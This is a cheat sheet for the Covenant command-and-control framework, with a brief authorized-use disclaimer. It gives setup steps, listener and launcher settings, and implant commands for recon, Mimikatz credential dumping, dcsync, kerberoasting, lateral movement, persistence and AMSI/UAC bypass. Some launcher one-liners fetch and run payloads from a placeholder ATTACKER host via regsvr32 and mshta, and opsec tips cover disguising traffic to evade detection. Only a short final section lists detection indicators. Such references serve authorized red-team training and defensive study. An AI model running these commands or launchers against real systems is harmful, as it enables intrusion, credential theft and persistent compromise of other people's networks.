← All cheat sheets

COVENANT

Authorized use only. Offensive reference for systems you own or are explicitly permitted to test. You are responsible for staying within the law.

.NET-based C2 framework with a web interface, multi-user support,
and extensive post-exploitation capabilities via "Grunts."

INSTALLATION & SETUP#

# Prerequisites
# .NET Core 3.1 SDK (or .NET 7+ for newer forks)
# Git

# Clone and build
git clone --recurse-submodules https://github.com/cobbr/Covenant
cd Covenant/Covenant
dotnet build
dotnet run

# Docker installation
git clone --recurse-submodules https://github.com/cobbr/Covenant
cd Covenant
docker build -t covenant .
docker run -it -p 7443:7443 -p 80:80 -p 443:443 \
    --name covenant -v $(pwd)/Data:/app/Data covenant

# Access web interface
# https://127.0.0.1:7443
# Create admin account on first run

LISTENERS#

# Create via web UI: Listeners > Create Listener

# HTTP Listener
  Name:           MyHTTPListener
  BindAddress:    0.0.0.0
  BindPort:       80
  ConnectAddress: ATTACKER_IP
  ConnectPort:    80
  URLs:           /api/v1, /static/js, /images/logo
  UseSSL:         false

# HTTPS Listener
  Name:           MyHTTPSListener
  BindAddress:    0.0.0.0
  BindPort:       443
  ConnectAddress: cdn.legit.com
  ConnectPort:    443
  UseSSL:         true
  SSLCert:        Upload PFX certificate
  SSLCertPass:    Certificate password

# Bridge Listener (C2 over C2)
  Used for pivoting through other channels
  Connects two Covenant instances

# Listener Profiles
  Customize HTTP headers, URLs, cookies, response bodies
  Create profiles to mimic legitimate web traffic

LAUNCHERS#

# Generate via web UI: Launchers > Create Launcher

# PowerShell Launcher
  Listener:     Select active listener
  DotNetVersion: Net40 or Net35
  Delay:        5 (seconds between callbacks)
  JitterPercent: 20
  # Generates encoded PowerShell one-liner

# Binary Launcher
  Generates standalone .exe
  Can be x86 or x64

# MSBuild Launcher
  Generates .xml for MSBuild.exe execution
  Living-off-the-land technique
  # C:\Windows\Microsoft.NET\Framework64\v4.0.30319\MSBuild.exe launcher.xml

# InstallUtil Launcher
  Generates .dll for InstallUtil.exe
  # C:\Windows\Microsoft.NET\Framework64\v4.0.30319\InstallUtil.exe /logfile= /LogToConsole=false /U launcher.dll

# Regsvr32 Launcher
  Generates .sct file for regsvr32
  # regsvr32 /s /n /u /i:http://ATTACKER/launcher.sct scrobj.dll

# Mshta Launcher
  Generates .hta for mshta.exe
  # mshta http://ATTACKER/launcher.hta

# Cscript / Wscript Launcher
  Generates .vbs or .js scripts

# certutil Launcher
  Uses certutil to download and decode payload

# Common launcher settings
  Delay:         Callback interval in seconds
  JitterPercent: Jitter percentage (0-100)
  KillDate:      Agent expiration (UTC)
  ConnectAttempts: Max connection retries

GRUNT INTERACTION#

# Grunts are Covenant's implant agents
# Interact via web UI: Grunts > Click active Grunt

# Information gathering
Grunt> WhoAmI                        # Current user
Grunt> GetCurrentDirectory           # Working directory
Grunt> GetHostname                   # Machine hostname
Grunt> GetDomainName                 # Domain name
Grunt> ListDirectory C:\             # Directory listing
Grunt> ProcessList                   # Running processes
Grunt> GetNetworkInterfaces          # Network info
Grunt> GetRegistryKey HKLM "SOFTWARE\Microsoft\Windows\CurrentVersion"

# File operations
Grunt> Download C:\Users\admin\flag.txt
Grunt> Upload /local/path C:\remote\path
Grunt> ReadTextFile C:\path\file.txt
Grunt> WriteFile C:\path\file.txt "content"
Grunt> DeleteFile C:\path\file.txt
Grunt> CopyFile C:\src C:\dst
Grunt> MoveFile C:\src C:\dst

# Execution
Grunt> Shell whoami                  # cmd.exe /c
Grunt> PowerShell Get-Process        # PowerShell execution
Grunt> Assembly /path/to/tool.exe "args"  # .NET assembly
Grunt> ShellCmd cmd.exe /c "dir"     # Explicit shell command

# Credential access
Grunt> Mimikatz sekurlsa::logonpasswords
Grunt> Mimikatz lsadump::sam
Grunt> Mimikatz lsadump::dcsync /domain:DOMAIN /user:krbtgt
Grunt> Rubeus kerberoast
Grunt> Rubeus asreproast
Grunt> Seatbelt -group=all
Grunt> SharpDPAPI triage

# Active Directory
Grunt> SharpHound -c All
Grunt> PowerView Get-DomainUser
Grunt> PowerView Get-DomainGroup
Grunt> PowerView Find-DomainShare
Grunt> PowerView Get-DomainGPO

# Lateral movement
Grunt> WMIGrunt TARGET LISTENER user password
Grunt> DCOMGrunt TARGET LISTENER
Grunt> BypassUACGrunt LISTENER
Grunt> PowerShellRemotingGrunt TARGET LISTENER

# Pivoting
Grunt> ConnectAttempt PIVOT_GRUNT_IP 443  # Connect through pivot

# Persistence
Grunt> PersistStartup C:\payload.exe     # Startup folder
Grunt> PersistWMI                        # WMI event subscription
Grunt> PersistAutorun                    # Registry autorun

# Token manipulation
Grunt> ImpersonateUser DOMAIN\user password
Grunt> ImpersonateProcess PID
Grunt> MakeToken DOMAIN\user password
Grunt> RevertToSelf
Grunt> GetSystem                         # Escalate to SYSTEM
Grunt> LogonPasswords                    # Dump logon passwords

# Evasion
Grunt> BypassAmsi                        # Patch AMSI
Grunt> BypassUAC                         # UAC bypass
Grunt> ScreenShot                        # Take screenshot

TASK REFERENCE#

Category          Key Tasks
--------          ---------
Recon             WhoAmI, GetHostname, GetDomainName, ProcessList,
                  GetNetworkInterfaces, GetRegistryKey, Seatbelt
File Ops          Download, Upload, ReadTextFile, ListDirectory,
                  DeleteFile, CopyFile, MoveFile
Execution         Shell, PowerShell, Assembly, ShellCmd
Credentials       Mimikatz, Rubeus, SharpDPAPI, LogonPasswords
AD Enum           SharpHound, PowerView, SharpView
Lateral Move      WMIGrunt, DCOMGrunt, PowerShellRemotingGrunt
Priv Esc          GetSystem, BypassUAC, BypassUACGrunt
Persistence       PersistStartup, PersistWMI, PersistAutorun
Evasion           BypassAmsi, BypassUAC
Token             ImpersonateUser, ImpersonateProcess, MakeToken

MULTI-USER OPERATIONS#

  - Web interface supports multiple simultaneous operators
  - Role-based access: Admin, User, Listener roles
  - All Grunt interactions logged with operator attribution
  - Task history and output accessible to all operators
  - Real-time updates across operator sessions

GRAPH VIEW#

  - Visual representation of compromised hosts
  - Shows Grunt connections and pivot chains
  - Click nodes to interact with Grunts
  - Helps visualize network topology during engagement

API ACCESS#

# Covenant exposes a REST API
# Authentication via JWT tokens

# Get token
curl -k https://127.0.0.1:7443/api/users/login \
  -H "Content-Type: application/json" \
  -d '{"username":"admin","password":"pass"}'

# Use API for automation
curl -k https://127.0.0.1:7443/api/grunts \
  -H "Authorization: Bearer JWT_TOKEN"

OPSEC CONSIDERATIONS#

  - Set appropriate delay and jitter for stealth
  - Use HTTPS with valid certificates
  - Customize listener HTTP profiles to mimic legit traffic
  - Use MSBuild/InstallUtil launchers for LOLBIN execution
  - Avoid PowerShell launcher in monitored environments
  - Set kill dates on Grunts
  - In-memory .NET execution avoids disk writes
  - Covenant is .NET-based; CLR loading is detectable
  - Monitor for AMSI bypass detections
  - Use Bridge listeners for complex pivoting

DETECTION INDICATORS#

  - .NET CLR loading in unexpected processes
  - HTTP callback patterns matching listener profile
  - PowerShell script block logging
  - Covenant-specific HTTP headers (if defaults used)
  - Named pipe usage for inter-process communication
  - Process hollowing or injection events
  - WMI/DCOM lateral movement events
  - AMSI bypass attempts